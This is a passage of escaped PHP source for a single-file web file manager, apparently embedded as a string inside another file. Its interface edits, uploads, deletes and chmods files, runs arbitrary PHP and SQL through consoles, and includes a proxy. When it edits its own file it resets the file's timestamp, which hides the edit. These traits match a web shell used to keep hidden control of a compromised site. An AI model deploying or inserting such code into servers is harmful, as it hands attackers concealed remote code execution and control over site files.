		curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		$result = curl_exec($ch);
		curl_close($ch);
		//$result = preg_replace(\'#(src)=[\"\\\'][http://]?([^:]*)[\"\\\']#Ui\', \'\\\\1=\"\'.$url.\'/\\\\2\"\', $result);
		$result = preg_replace_callback(\'#(href|src)=[\"\\\'][http://]?([^:]*)[\"\\\']#Ui\', \'fm_url_proxy\', $result);
		$result = preg_replace(\'%(<body.*?>)%i\', \'$1\'.\'<style>\'.fm_home_style().\'</style>\'.$proxy_form, $result);
		echo $result;
		die();
	} 
}
?>
<!doctype html>
<html>
<head>     
	<meta charset=\"utf-8\" />
	<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />
    <title><?=__(\'File manager\')?></title>
<style>
body {
	background-color:	white;
	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
	background-color: #ACBBC6
}

th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;
}

th	{
	height:				25px;
	background-color:	#006699;
	color:				#FFA34F;
	font-weight:		bold;
	font-size:			11px;
}

.row1 {
	background-color:	#EFEFEF;
}

.row2 {
	background-color:	#DEE3E7;
}

.row3 {
	background-color:	#D1D7DC;
	padding: 5px;
}

tr.row1:hover {
	background-color:	#F3FCFC;
}

tr.row2:hover {
	background-color:	#F0F6F6;
}

.whole {
	width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
	font: 9pt \'Courier New\', courier;
	line-height: 125%;
	padding: 5px;
}

.textarea_input {
	height: 1em;
}

.textarea_input:focus {
	height: auto;
}

input[type=submit]{
	background: #FCFCFC none !important;
	cursor: pointer;
}

.folder {
    background-image: url(\"\");
}

.file {
    background-image: url(\"\");
}
<?=fm_home_style()?>
.img {
	background-image: 
url(\"\");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = \'?fm=true\';
if (isset($_POST[\'sqlrun\'])&&!empty($fm_config[\'enable_sql_console\'])){
	$res = empty($_POST[\'sql\']) ? \'\' : $_POST[\'sql\'];
	$res_lng = \'sql\';
} elseif (isset($_POST[\'phprun\'])&&!empty($fm_config[\'enable_php_console\'])){
	$res = empty($_POST[\'php\']) ? \'\' : $_POST[\'php\'];
	$res_lng = \'php\';
} 
if (isset($_GET[\'fm_settings\'])) {
	echo \' 
<table class=\"whole\">
<form method=\"post\" action=\"\">
<tr><th colspan=\"2\">\'.__(\'File manager\').\' - \'.__(\'Settings\').\'</th></tr>
\'.(empty($msg)?\'\':\'<tr><td class=\"row2\" colspan=\"2\">\'.$msg.\'</td></tr>\').\'
\'.fm_config_checkbox_row(__(\'Show size of the folder\'),\'show_dir_size\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'pictures\'),\'show_img\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'Make directory\'),\'make_directory\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'New file\'),\'new_file\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'Upload\'),\'upload_file\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' PHP version\',\'show_php_ver\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' PHP ini\',\'show_php_ini\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'Generation time\'),\'show_gt\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' xls\',\'show_xls\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' PHP \'.__(\'Console\'),\'enable_php_console\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' SQL \'.__(\'Console\'),\'enable_sql_console\').\'
<tr><td class=\"row1\"><input name=\"fm_config[sql_server]\" value=\"\'.$fm_config[\'sql_server\'].\'\" type=\"text\"></td><td class=\"row2 whole\">SQL server</td></tr>
<tr><td class=\"row1\"><input name=\"fm_config[sql_username]\" value=\"\'.$fm_config[\'sql_username\'].\'\" type=\"text\"></td><td class=\"row2 whole\">SQL user</td></tr>
<tr><td class=\"row1\"><input name=\"fm_config[sql_password]\" value=\"\'.$fm_config[\'sql_password\'].\'\" type=\"text\"></td><td class=\"row2 whole\">SQL password</td></tr>
<tr><td class=\"row1\"><input name=\"fm_config[sql_db]\" value=\"\'.$fm_config[\'sql_db\'].\'\" type=\"text\"></td><td class=\"row2 whole\">SQL DB</td></tr>
\'.fm_config_checkbox_row(__(\'Show\').\' Proxy\',\'enable_proxy\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' phpinfo()\',\'show_phpinfo\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'Settings\'),\'fm_settings\').\'
\'.fm_config_checkbox_row(__(\'Restore file time after editing\'),\'restore_time\').\'
\'.fm_config_checkbox_row(__(\'File manager\').\': \'.__(\'Restore file time after editing\'),\'fm_restore_time\').\'
<tr><td class=\"row3\"><a href=\"\'.fm_url().\'?fm_settings=true&fm_config_delete=true\">\'.__(\'Reset settings\').\'</a></td><td class=\"row3\"><input type=\"submit\" value=\"\'.__(\'Save\').\'\" name=\"fm_config[fm_set_submit]\"></td></tr>
</form>
</table>
<table>
<form method=\"post\" action=\"\">
<tr><th colspan=\"2\">\'.__(\'Settings\').\' - \'.__(\'Authorization\').\'</th></tr>
<tr><td class=\"row1\"><input name=\"fm_login[authorize]\" value=\"1\" \'.($auth[\'authorize\']?\'checked\':\'\').\' type=\"checkbox\" id=\"auth\"></td><td class=\"row2 whole\"><label for=\"auth\">\'.__(\'Authorization\').\'</label></td></tr>
<tr><td class=\"row1\"><input name=\"fm_login[login]\" value=\"\'.$auth[\'login\'].\'\" type=\"text\"></td><td class=\"row2 whole\">\'.__(\'Login\').\'</td></tr>
<tr><td class=\"row1\"><input name=\"fm_login[password]\" value=\"\'.$auth[\'password\'].\'\" type=\"text\"></td><td class=\"row2 whole\">\'.__(\'Password\').\'</td></tr>
<tr><td class=\"row1\"><input name=\"fm_login[cookie_name]\" value=\"\'.$auth[\'cookie_name\'].\'\" type=\"text\"></td><td class=\"row2 whole\">\'.__(\'Cookie\').\'</td></tr>
<tr><td class=\"row1\"><input name=\"fm_login[days_authorization]\" value=\"\'.$auth[\'days_authorization\'].\'\" type=\"text\"></td><td class=\"row2 whole\">\'.__(\'Days\').\'</td></tr>
<tr><td class=\"row1\"><textarea name=\"fm_login[script]\" cols=\"35\" rows=\"7\" class=\"textarea_input\" id=\"auth_script\">\'.$auth[\'script\'].\'</textarea></td><td class=\"row2 whole\">\'.__(\'Script\').\'</td></tr>
<tr><td colspan=\"2\" class=\"row3\"><input type=\"submit\" value=\"\'.__(\'Save\').\'\" ></td></tr>
</form>
</table>\';
echo fm_tpl_form(\'php\'),fm_tpl_form(\'sql\');
} elseif (isset($proxy_form)) {
	die($proxy_form);
} elseif (isset($res_lng)) {	
?>
<table class=\"whole\">
<tr>
    <th><?=__(\'File manager\').\' - \'.$path?></th>
</tr>
<tr>
    <td class=\"row2\"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__(\'Console\')?><?php
	if($res_lng==\'sql\') echo \' - Database: \'.$fm_config[\'sql_db\'].\'</h2></td><td>\'.fm_run_input(\'php\');
	else echo \'</h2></td><td>\'.fm_run_input(\'sql\');
	?></td></tr></table></td>
</tr>
<tr>
    <td class=\"row1\">
		<a href=\"<?=$url_inc.\'&path=\' . $path;?>\"><?=__(\'Back\')?></a>
		<form action=\"\" method=\"POST\" name=\"console\">
		<textarea name=\"<?=$res_lng?>\" cols=\"80\" rows=\"10\" style=\"width: 90%\"><?=$res?></textarea><br/>
		<input type=\"reset\" value=\"<?=__(\'Reset\')?>\">
		<input type=\"submit\" value=\"<?=__(\'Submit\')?>\" name=\"<?=$res_lng?>run\">
<?php
$str_tmpl = $res_lng.\'_templates\';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : \'\';
if (!empty($tmpl)){
	$active = isset($_POST[$res_lng.\'_tpl\']) ? $_POST[$res_lng.\'_tpl\'] : \'\';
	$select = \'<select name=\"\'.$res_lng.\'_tpl\" title=\"\'.__(\'Template\').\'\" onchange=\"if (this.value!=-1) document.forms[\\\'console\\\'].elements[\\\'\'.$res_lng.\'\\\'].value = this.options[selectedIndex].value; else document.forms[\\\'console\\\'].elements[\\\'\'.$res_lng.\'\\\'].value =\\\'\\\';\" >\'.\"\\n\";
	$select .= \'<option value=\"-1\">\' . __(\'Select\') . \"</option>\\n\";
	foreach ($tmpl as $key=>$value){
		$select.=\'<option value=\"\'.$value.\'\" \'.((!empty($value)&&($value==$active))?\'selected\':\'\').\' >\'.__($key).\"</option>\\n\";
	}
	$select .= \"</select>\\n\";
	echo $select;
}
?>
		</form>
	</td>
</tr>
</table>
<?php
	if (!empty($res)) {
		$fun=\'fm_\'.$res_lng;
		echo \'<h3>\'.strtoupper($res_lng).\' \'.__(\'Result\').\'</h3><pre>\'.$fun($res).\'</pre>\';
	}
} elseif (!empty($_REQUEST[\'edit\'])){
	if(!empty($_REQUEST[\'save\'])) {
		$fn = $path . $_REQUEST[\'edit\'];
		$filemtime = filemtime($fn);
	    if (file_put_contents($fn, $_REQUEST[\'newcontent\'])) $msg .= __(\'File updated\');
		else $msg .= __(\'Error occurred\');
		if ($_GET[\'edit\']==basename(__FILE__)) {
			touch(__FILE__,1415116371);
		} else {
			if (!empty($fm_config[\'restore_time\'])) touch($fn,$filemtime);
		}
	}
    $oldcontent = @file_get_contents($path . $_REQUEST[\'edit\']);
    $editlink = $url_inc . \'&edit=\' . $_REQUEST[\'edit\'] . \'&path=\' . $path;
    $backlink = $url_inc . \'&path=\' . $path;
?>
<script src=\"https://cdn.jsdelivr.net/gh/Den1xxx/EditArea@master/edit_area/edit_area_full.js\"></script>
<table border=\'0\' cellspacing=\'0\' cellpadding=\'1\' width=\"100%\">
<tr>
    <th><?=__(\'File manager\').\' - \'.__(\'Edit\').\' - \'.$path.$_REQUEST[\'edit\']?></th>
</tr>
<tr>
    <td class=\"row1\">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class=\"row1\">
        <?=fm_home()?> <a href=\"<?=$backlink?>\"><?=__(\'Back\')?></a>
	</td>
</tr>
<tr>
    <td class=\"row1\" align=\"center\">
        <form name=\"form1\" method=\"post\" action=\"<?=$editlink?>\">
            <textarea name=\"newcontent\" id=\"newcontent\" cols=\"45\" rows=\"25\" style=\"width:99%\" spellcheck=\"false\"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type=\"submit\" name=\"save\" value=\"<?=__(\'Submit\')?>\">
            <input type=\"submit\" name=\"cancel\" value=\"<?=__(\'Cancel\')?>\">
        </form>
    </td>
</tr>
</table>
<script language=\"Javascript\" type=\"text/javascript\">
document.addEventListener(\'DOMContentLoaded\', function() {
	editAreaLoader.init({
	id: \"newcontent\"
	,display: \"later\"
	,start_highlight: true
	,allow_resize: \"both\"
	,allow_toggle: true
	,word_wrap: true
	,language: \"ru\"
	,syntax: \"<?=pathinfo($_REQUEST[\'edit\'], PATHINFO_EXTENSION)?>\"	
	,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"
	,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"
	});
});
</script>
<?php
echo $auth[\'script\'];
} elseif(!empty($_REQUEST[\'rights\'])){
	if(!empty($_REQUEST[\'save\'])) {
	    if(fm_chmod($path . $_REQUEST[\'rights\'], fm_convert_rights($_REQUEST[\'rights_val\']), @$_REQUEST[\'recursively\']))
		$msg .= (__(\'File updated\')); 
		else $msg .= (__(\'Error occurred\'));
	}
	clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST[\'rights\'], true);
    $link = $url_inc . \'&rights=\' . $_REQUEST[\'rights\'] . \'&path=\' . $path;
    $backlink = $url_inc . \'&path=\' . $path;
?>
<table class=\"whole\">
<tr>
    <th><?=__(\'File manager\').\' - \'.$path?></th>
</tr>
<tr>
    <td class=\"row1\">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class=\"row1\">
        <a href=\"<?=$backlink?>\"><?=__(\'Back\')?></a>
	</td>
</tr>
<tr>
    <td class=\"row1\" align=\"center\">
        <form name=\"form1\" method=\"post\" action=\"<?=$link?>\">
           <?=__(\'Rights\').\' - \'.$_REQUEST[\'rights\']?> <input type=\"text\" name=\"rights_val\" value=\"<?=$oldrights?>\">
        <?php if (is_dir($path.$_REQUEST[\'rights\'])) { ?>
            <input type=\"checkbox\" name=\"recursively\" value=\"1\"> <?=__(\'Recursively\')?><br/>
        <?php } ?>
            <input type=\"submit\" name=\"save\" value=\"<?=__(\'Submit\')?>\">
        </form>
    </td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST[\'rename\'])&&$_REQUEST[\'rename\']<>\'.\') {
	if(!empty($_REQUEST[\'save\'])) {
	    rename($path . $_REQUEST[\'rename\'], $path . $_REQUEST[\'newname\']);
		$msg .= (__(\'File updated\'));
		$_REQUEST[\'rename\'] = $_REQUEST[\'newname\'];
	}
	clearstatcache();
    $link = $url_inc . \'&rename=\' . $_REQUEST[\'rename\'] . \'&path=\' . $path;
    $backlink = $url_inc . \'&path=\' . $path;

?>
<table class=\"whole\">
<tr>
    <th><?=__(\'File manager\').\' - \'.$path?></th>
</tr>
<tr>
    <td class=\"row1\">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class=\"row1\">
        <a href=\"<?=$backlink?>\"><?=__(\'Back\')?></a>
	</td>
</tr>
<tr>
    <td class=\"row1\" align=\"center\">
        <form name=\"form1\" method=\"post\" action=\"<?=$link?>\">
            <?=__(\'Rename\')?>: <input type=\"text\" name=\"newname\" value=\"<?=$_REQUEST[\'rename\']?>\"><br/>
            <input type=\"submit\" name=\"save\" value=\"<?=__(\'Submit\')?>\">
        </form>
    </td>
</tr>
</table>
<?php
} else {
//Let\'s rock!
    $msg = \'\';
    if(!empty($_FILES[\'upload\'])&&!empty($fm_config[\'upload_file\'])) {
        if(!empty($_FILES[\'upload\'][\'name\'])){
            $_FILES[\'upload\'][\'name\'] = str_replace(\'%\', \'\', $_FILES[\'upload\'][\'name\']);
            if(!move_uploaded_file($_FILES[\'upload\'][\'tmp_name\'], $path . $_FILES[\'upload\'][\'name\'])){
                $msg .= __(\'Error occurred\');
            } else {
				$msg .= __(\'Files uploaded\').\': \'.$_FILES[\'upload\'][\'name\'];
			}
        }
    } elseif(!empty($_REQUEST[\'delete\'])&&$_REQUEST[\'delete\']<>\'.\') {
        if(!fm_del_files(($path . $_REQUEST[\'delete\']), true)) {
            $msg .= __(\'Error occurred\');
        } else {
			$msg .= __(\'Deleted\').\' \'.$_REQUEST[\'delete\'];
		}
	} elseif(!empty($_REQUEST[\'mkdir\'])&&!empty($fm_config[\'make_directory\'])) {
        if(!@mkdir($path . $_REQUEST[\'dirname\'],0777)) {
            $msg .= __(\'Error occurred\');
        } else {
			$msg .= __(\'Created\').\' \'.$_REQUEST[\'dirname\'];
		}
    } elseif(!empty($_POST[\'search_recursive\'])) {
		ini_set(\'max_execution_time\', \'0\');
		$search_data =  find_text_in_files($_POST[\'path\'], $_POST[\'mask\'], $_POST[\'search_recursive\']);
		if(!empty($search_data)) {
			$msg .= __(\'Found in files\').\' (\'.count($search_data).\'):<br>\';
			foreach ($search_data as $filename) {
				$msg .= \'<a href=\"\'.fm_url(true).\'?fm=true&edit=\'.basename($filename).\'&path=\'.str_replace(\'/\'.basename($filename),\'/\',$filename).\'\" title=\"\' . __(\'Edit\') . \'\">\'.basename($filename).\'</a>&nbsp; &nbsp;\';
			}
		} else {
			$msg .= __(\'Nothing founded\');
		}	
	} elseif(!empty($_REQUEST[\'mkfile\'])&&!empty($fm_config[\'new_file\'])) {
        if(!$fp=@fopen($path . $_REQUEST[\'filename\'],\"w\")) {
            $msg .= __(\'Error occurred\');
        } else {
			fclose($fp);
			$msg .= __(\'Created\').\' \'.$_REQUEST[\'filename\'];
		}
    } elseif (isset($_GET[\'zip\'])) {
		$source = base64_decode($_GET[\'zip\']);
		$destination = basename($source).\'.zip\';
		set_time_limit(0);
		$phar = new PharData($destination);
		$phar->buildFromDirectory($source);
		if (is_file($destination))
		$msg .= __(\'Task\').\' \"\'.__(\'Archiving\').\' \'.$destination.\'\" \'.__(\'done\').
		\'.&nbsp;\'.fm_link(\'download\',$path.$destination,__(\'Download\'),__(\'Download\').\' \'. $destination)
		.\'&nbsp;<a href=\"\'.$url_inc.\'&delete=\'.$destination.\'&path=\' . $path.\'\" title=\"\'.__(\'Delete\').\' \'. $destination.\'\" >\'.__(\'Delete\') . \'</a>\';
		else $msg .= __(\'Error occurred\').\': \'.__(\'no files\');
	} elseif (isset($_GET[\'gz\'])) {
		$source = base64_decode($_GET[\'gz\']);
		$archive = $source.\'.tar\';
		$destination = basename($source).\'.tar\';
		if (is_file($archive)) unlink($archive);
		if (is_file($archive.\'.gz\')) unlink($archive.\'.gz\');
		clearstatcache();
		set_time_limit(0);
		//die();
		$phar = new PharData($destination);
		$phar->buildFromDirectory($source);
		$phar->compress(Phar::GZ,\'.tar.gz\');
		unset($phar);
		if (is_file($archive)) {
			if (is_file($archive.\'.gz\')) {
				unlink($archive); 
				$destination .= \'.gz\';
			}

			$msg .= __(\'Task\').\' \"\'.__(\'Archiving\').\' \'.$destination.\'\" \'.__(\'done\').
			\'.&nbsp;\'.fm_link(\'download\',$path.$destination,__(\'Download\'),__(\'Download\').\' \'. $destination)
			.\'&nbsp;<a href=\"\'.$url_inc.\'&delete=\'.$destination.\'&path=\' . $path.\'\" title=\"\'.__(\'Delete\').\' \'.$destination.\'\" >\'.__(\'Delete\').\'</a>\';
		} else $msg .= __(\'Error occurred\').\': \'.__(\'no files\');
	} elseif (isset($_GET[\'decompress\'])) {
		// $source = base64_decode($_GET[\'decompress\']);
		// $destination = basename($source);
		// $ext = end(explode(\".\", $destination));
		// if ($ext==\'zip\' OR $ext==\'gz\') {
			// $phar = new PharData($source);
			// $phar->decompress();
			// $base_file = str_replace(\'.\'.$ext,\'\',$destination);
			// $ext = end(explode(\".\", $base_file));
			// if ($ext==\'tar\'){
				// $phar = new PharData($base_file);
				// $phar->extractTo(dir($source));
			// }
		// } 
		// $msg .= __(\'Task\').\' \"\'.__(\'Decompress\').\' \'.$source.\'\" \'.__(\'done\');
	} elseif (isset($_GET[\'gzfile\'])) {
		$source = base64_decode($_GET[\'gzfile\']);
		$archive = $source.\'.tar\';
		$destination = basename($source).\'.tar\';
		if (is_file($archive)) unlink($archive);
		if (is_file($archive.\'.gz\')) unlink($archive.\'.gz\');
		set_time_limit(0);
		//echo $destination;
		$ext_arr = explode(\'.\',basename($source));
		if (isset($ext_arr[1])) {
			unset($ext_arr[0]);
			$ext=implode(\'.\',$ext_arr);
		} 
		$phar = new PharData($destination);
		$phar->addFile($source);
		$phar->compress(Phar::GZ,$ext.\'.tar.gz\');
		unset($phar);
		if (is_file($archive)) {
			if (is_file($archive.\'.gz\')) {
				unlink($archive); 
				$destination .= \'.gz\';
			}
			$msg .= __(\'Task\').\' \"\'.__(\'Archiving\').\' \'.$destination.\'\" \'.__(\'done\').
			\'.&nbsp;\'.fm_link(\'download\',$path.$destination,__(\'Download\'),__(\'Download\').\' \'. $destination)
			.\'&nbsp;<a href=\"\'.$url_inc.\'&delete=\'.$destination.\'&path=\' . $path.\'\" title=\"\'.__(\'Delete\').\' \'.$destination.\'\" >\'.__(\'Delete\').\'</a>\';
		} else $msg .= __(\'Error occurred\').\': \'.__(\'no files\');
	}
?>
<table class=\"whole\" id=\"header_table\" >
<tr>
    <th colspan=\"2\"><?=__(\'File manager\')?><?=(!empty($path)?\' - \'.$path:\'\')?></th>
</tr>
<?php if(!empty($msg)){ ?>
<tr>
	<td colspan=\"2\" class=\"row2\"><?=$msg?></td>
</tr>
<?php } ?>
<tr>
    <td class=\"row2\">
		<table>
			<tr>
			<td>
				<?=fm_home()?>
			</td>
			<td>
			<?php if(!empty($fm_config[\'make_directory\'])) { ?>
				<form method=\"post\" action=\"<?=$url_inc?>\">
				<input type=\"hidden\" name=\"path\" value=\"<?=$path?>\" />
				<input type=\"text\" name=\"dirname\" size=\"15\">
				<input type=\"submit\" name=\"mkdir\" value=\"<?=__(\'Make directory\')?>\">
				</form>
			<?php } ?>
			</td>
			<td>
			<?php if(!empty($fm_config[\'new_file\'])) { ?>
				<form method=\"post\" action=\"<?=$url_inc?>\">
				<input type=\"hidden\" name=\"path\"     value=\"<?=$path?>\" />
				<input type=\"text\"   name=\"filename\" size=\"15\">
				<input type=\"submit\" name=\"mkfile\"   value=\"<?=__(\'New file\')?>\">
				</form>
			<?php } ?>
			</td>
			<td>
				<form  method=\"post\" action=\"<?=$url_inc?>\" style=\"display:inline\">
				<input type=\"hidden\" name=\"path\" value=\"<?=$path?>\" />
				<input type=\"text\" placeholder=\"<?=__(\'Recursive search\')?>\" name=\"search_recursive\" value=\"<?=!empty($_POST[\'search_recursive\'])?$_POST[\'search_recursive\']:\'\'?>\" size=\"15\">
				<input type=\"text\" name=\"mask\" placeholder=\"<?=__(\'Mask\')?>\" value=\"<?=!empty($_POST[\'mask\'])?$_POST[\'mask\']:\'*.*\'?>\" size=\"5\">
				<input type=\"submit\" name=\"search\" value=\"<?=__(\'Search\')?>\">
				</form>
			</td>
			<td>
			<?=fm_run_input(\'php\')?>
			</td>
			<td>
			<?=fm_run_input(\'sql\')?>
			</td>
			</tr>
		</table>
    </td>
    <td class=\"row3\">
		<table>
		<tr>
		<td>
		<?php if (!empty($fm_config[\'upload_file\'])) { ?>
			<form name=\"form1\" method=\"post\" action=\"<?=$url_inc?>\" enctype=\"multipart/form-data\">
			<input type=\"hidden\" name=\"path\" value=\"<?=$path?>\" />
			<input type=\"file\" name=\"upload\" id=\"upload_hidden\" style=\"position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;\" onchange=\"document.getElementById(\'upload_visible\').value = this.value;\" />
			<input type=\"text\" readonly=\"1\" id=\"upload_visible\" placeholder=\"<?=__(\'Select the file\')?>\" style=\"cursor: pointer;\" onclick=\"document.getElementById(\'upload_hidden\').click();\" />
			<input type=\"submit\" name=\"test\" value=\"<?=__(\'Upload\')?>\" />
			</form>
		<?php } ?>
		</td>
		<td>
		<?php if ($auth[\'authorize\']) { ?>
			<form action=\"\" method=\"post\">&nbsp;&nbsp;&nbsp;
			<input name=\"quit\" type=\"hidden\" value=\"1\">
			<?=__(\'Hello\')?>, <?=$auth[\'login\']?>
			<input type=\"submit\" value=\"<?=__(\'Quit\')?>\">
			</form>
		<?php } ?>
		</td>
		<td>
		<?=fm_lang_form($language)?>
		</td>
		<tr>
		</table>
    </td>
</tr>
</table>
<table class=\"all\" border=\'0\' cellspacing=\'1\' cellpadding=\'1\' id=\"fm_table\" width=\"100%\">
<thead>
<tr> 
    <th style=\"white-space:nowrap\"> <?=__(\'Filename\')?> </th>
    <th style=\"white-space:nowrap\"> <?=__(\'Size\')?> </th>
    <th style=\"white-space:nowrap\"> <?=__(\'Date\')?> </th>
    <th style=\"white-space:nowrap\"> <?=__(\'Rights\')?> </th>
    <th colspan=\"4\" style=\"white-space:nowrap\"> <?=__(\'Manage\')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, \'\', \'all\', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
    if(@is_dir($path . $file)){
        $dirs[] = $file;
    } else {
        $files[] = $file;
    }
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);

foreach ($elements as $file){
    $filename = $path . $file;
    $filedata = @stat($filename);
    if(@is_dir($filename)){
		$filedata[7] = \'\';
		if (!empty($fm_config[\'show_dir_size\'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        $link = \'<a href=\"\'.$url_inc.\'&path=\'.$path.$file.\'\" title=\"\'.__(\'Show\').\' \'.$file.\'\"><span class=\"folder\">&nbsp;&nbsp;&nbsp;&nbsp;</span> \'.$file.\'</a>\';
        $loadlink= (fm_root($file)||$phar_maybe) ? \'\' : fm_link(\'zip\',$filename,__(\'Compress\').\'&nbsp;zip\',__(\'Archiving\').\' \'. $file);
		$arlink  = (fm_root($file)||$phar_maybe) ? \'\' : fm_link(\'gz\',$filename,__(\'Compress\').\'&nbsp;.tar.gz\',__(\'Archiving\').\' \'.$file);
        $style = \'row2\';
		 if (!fm_root($file)) $alert = \'onClick=\"if(confirm(\\\'\' . __(\'Are you sure you want to delete this directory (recursively)?\').\'\\n /\'. $file. \'\\\')) document.location.href = \\\'\' . $url_inc . \'&delete=\' . $file . \'&path=\' . $path  . \'\\\'\"\'; else $alert = \'\';
    } else {
		$link = 
			$fm_config[\'show_img\']&&@getimagesize($filename) 
			? \'<a target=\"_blank\" onclick=\"var lefto = screen.availWidth/2-320;window.open(\\\'\'
			. fm_img_link($filename)
			.\'\\\',\\\'popup\\\',\\\'width=640,height=480,left=\\\' + lefto + \\\',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\\\');return false;\" href=\"\'.fm_img_link($filename).\'\"><span class=\"img\">&nbsp;&nbsp;&nbsp;&nbsp;</span> \'.$file.\'</a>\'
			: \'<a href=\"\' . $url_inc . \'&edit=\' . $file . \'&path=\' . $path. \'\" title=\"\' . __(\'Edit\') . \'\"><span class=\"file\">&nbsp;&nbsp;&nbsp;&nbsp;</span> \'.$file.\'</a>\';
		$e_arr = explode(\".\", $file);
		$ext = end($e_arr);
        $loadlink =  fm_link(\'download\',$filename,__(\'Download\'),__(\'Download\').\' \'. $file);
		$arlink = in_array($ext,array(\'zip\',\'gz\',\'tar\')) 
		? \'\'
		: ((fm_root($file)||$phar_maybe) ? \'\' : fm_link(\'gzfile\',$filename,__(\'Compress\').\'&nbsp;.tar.gz\',__(\'Archiving\').\' \'. $file));
        $style = \'row1\';
		$alert = \'onClick=\"if(confirm(\\\'\'. __(\'File selected\').\': \\n\'. $file. \'. \\n\'.__(\'Are you sure you want to delete this file?\') . \'\\\')) document.location.href = \\\'\' . $url_inc . \'&delete=\' . $file . \'&path=\' . $path  . \'\\\'\"\';
    }
    $deletelink = fm_root($file) ? \'\' : \'<a href=\"#\" title=\"\' . __(\'Delete\') . \' \'. $file . \'\" \' . $alert . \'>\' . __(\'Delete\') . \'</a>\';
    $renamelink = fm_root($file) ? \'\' : \'<a href=\"\' . $url_inc . \'&rename=\' . $file . \'&path=\' . $path . \'\" title=\"\' . __(\'Rename\') .\' \'. $file . \'\">\' . __(\'Rename\') . \'</a>\';
    $rightstext = ($file==\'.\' || $file==\'..\') ? \'\' : \'<a href=\"\' . $url_inc . \'&rights=\' . $file . \'&path=\' . $path . \'\" title=\"\' . __(\'Rights\') .\' \'. $file . \'\">\' . @fm_rights_string($filename) . \'</a>\';
?>
<tr class=\"<?=$style?>\"> 
    <td><?=$link?></td>
    <td><?=$filedata[7]?></td>
    <td style=\"white-space:nowrap\"><?=gmdate(\"Y-m-d H:i:s\",$filedata[9])?></td>
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
<?php
    }
}
?>
</tbody>
</table>
<div class=\"row3\"><?php
	$mtime = explode(\' \', microtime()); 
	$totaltime = $mtime[0] + $mtime[1] - $starttime; 
	echo fm_home().\' | ver. \'.$fm_version.\' | <a href=\"https://github.com/Den1xxx/Filemanager\">Github</a>  | <a href=\"\'.fm_site_url().\'\">.</a>\';
	if (!empty($fm_config[\'show_php_ver\'])) echo \' | PHP \'.phpversion();
	if (!empty($fm_config[\'show_php_ini\'])) echo \' | \'.php_ini_loaded_file();
	if (!empty($fm_config[\'show_gt\'])) echo \' | \'.__(\'Generation time\').\': \'.round($totaltime,2);
	if (!empty($fm_config[\'enable_proxy\'])) echo \' | <a href=\"?proxy=true\">proxy</a>\';
	if (!empty($fm_config[\'show_phpinfo\'])) echo \' | <a href=\"?phpinfo=true\">phpinfo</a>\';
	if (!empty($fm_config[\'show_xls\'])&&!empty($link)) echo \' | <a href=\"javascript: void(0)\" onclick=\"var obj = new table2Excel(); obj.CreateExcelSheet(\\\'fm_table\\\',\\\'export\\\');\" title=\"\'.__(\'Download\').\' xls\">xls</a>\';
	if (!empty($fm_config[\'fm_settings\'])) echo \' | <a href=\"?fm_settings=true\">\'.__(\'Settings\').\'</a>\';
	?>
</div>
<script type=\"text/javascript\">
function download_xls(filename, text) {
	var element = document.createElement(\'a\');
	element.setAttribute(\'href\', \'data:application/vnd.ms-excel;base64,\' + text);
	element.setAttribute(\'download\', filename);
	element.style.display = \'none\';
	document.body.appendChild(element);
	element.click();
	document.body.removeChild(element);
}

function base64_encode(m) {
	for (var k = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\".split(\"\"), c, d, h, e, a, g = \"\", b = 0, f, l = 0; l < m.length; ++l) {
		c = m.charCodeAt(l);
		if (128 > c) d = 1;
		else
